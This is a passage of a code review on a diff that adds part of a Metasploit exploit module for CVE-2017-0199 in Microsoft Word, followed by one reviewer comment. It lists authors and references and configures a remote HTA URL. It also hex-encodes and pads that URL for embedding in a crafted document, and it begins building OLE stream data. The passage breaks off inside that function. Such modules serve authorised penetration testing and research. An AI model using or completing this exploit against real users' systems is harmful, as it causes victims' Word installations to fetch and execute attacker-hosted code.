modules/exploits/windows/fileformat/office_word_hta.rb

```diff
@@ -0,0 +1,132 @@
+        in Oct 2016. This module was created by reversing a public
+        malware sample.
+      },
+      'Author'         =>
+        [
+          'Haifei Li', # vulnerability analysis
+          'ryHanson',
+          'wdormann',
+          'DidierStevens',
+          'vysec',
+          'Nixawk' # module developer
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2017-0199'],
+        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
+        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
+        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
+        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
+        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
+        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
+        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
+        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
+        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
+        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Microsoft Office Word', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 14 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The path to a online hta file.', 'http://example.com/test.rtf'])
+      ], self.class)
+  end
+
+  def generate_uri
+    uri_maxlength = 112
+
+    uri = datastore['TARGETURI']
+    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
+    uri.delete!("\n")
+    uri.delete!("\\x")
+    uri.delete!("\\")
+
+    padding_length = uri_maxlength * 2 - uri.length
+    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
+    padding_length.times { uri << "0" }
+    uri
+  end
+
+  def create_ole_ministream_data
+    # require 'rex/ole'
+    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+    # ministream = ole.instance_variable_get(:@ministream)
+    # ministream_data = ministream.instance_variable_get(:@data)
```

Comment:
we should take a look at what was broken in rex-ole, e.g. is it disallowing us to parse a corrupted document